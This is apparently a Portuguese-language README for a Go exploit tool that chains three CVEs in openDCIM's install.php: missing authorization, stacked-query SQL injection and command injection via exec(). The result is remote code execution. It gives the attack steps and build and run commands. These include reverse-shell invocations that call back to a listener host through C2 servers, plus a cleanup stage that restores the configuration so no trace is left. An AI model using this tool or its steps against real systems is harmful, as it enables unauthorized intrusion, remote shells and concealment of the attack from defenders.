
Cadeia de SQLi para RCE no openDCIM install.php (CWE-862 + CWE-89 + CWE-78)
Cadeia de execução remota de código que visa o formulário de configuração LDAP do install.php do openDCIM. Construída sobre o framework VulnCheck go-exploit.
| # | CVE | CWE | Description |
|---|---|---|---|
| 1 | CVE-2026-28515 | CWE-862 | install.php não realiza verificação de função antes do formulário de configuração LDAP - qualquer usuário pode acessá-lo |
| 2 | CVE-2026-28516 | CWE-89 | Config::UpdateParameter() usa interpolação de strings, consultas empilhadas via PDO+MySQL |
| 3 | CVE-2026-28517 | CWE-78 | report_network_map.php passa o valor de configuração dot diretamente para exec() |
Afetadas: Todas as versões (testado no commit mais recente 4467e9c4)
install.php - a injeção de SQL via formulário LDAP faz backup da configuração e sobrescreve dot com um payload de comandoreport_network_map.php - aciona exec(), confirma RCE via saída de idinstall.php - sobrescreve dot com payload de reverse shellreport_network_map.php - aciona reverse shellinstall.php - restaura todos os valores originais de configuração da tabela de backupNenhum rastro é deixado no banco de dados após a exploração.
go build -o opendcim-exploit .
# Scan only
./opendcim-exploit -a -rhost 10.0.0.1 -rport 80
# Exploit with reverse shell
./opendcim-exploit -e -rhost 10.0.0.1 -rport 80 -lhost 10.0.0.2 -lport 4444 -c2 SimpleShellServer
./opendcim-exploit -e -rhost 10.0.0.1 -rport 80 -lhost 10.0.0.2 -lport 4444 -c2 SimpleShellServer -username user -password pass
./opendcim-exploit -e -rhost 10.0.0.1 -rport 443 -ssl -lhost 10.0.0.2 -lport 4444 -c2 SSLShellServer
| Flag | Default | Description |
|---|---|---|
-rhost | Host alvo | |
-rport | 80 | Porta alvo |
-ssl | false | Usar HTTPS |
-lhost | Host do listener (para reverse shell) | |
-lport | Porta do listener (para reverse shell) | |
-c2 | Tipo de C2: SimpleShellServer ou SSLShellServer | |
-username | Nome de usuário da autenticação HTTP Basic (omitir para implantações SetEnv) | |
-password | Senha da autenticação HTTP Basic (omitir para implantações SetEnv) | |
-a | Detecção de ativos (verifica se o alvo é explorável) | |
-e | Modo exploit |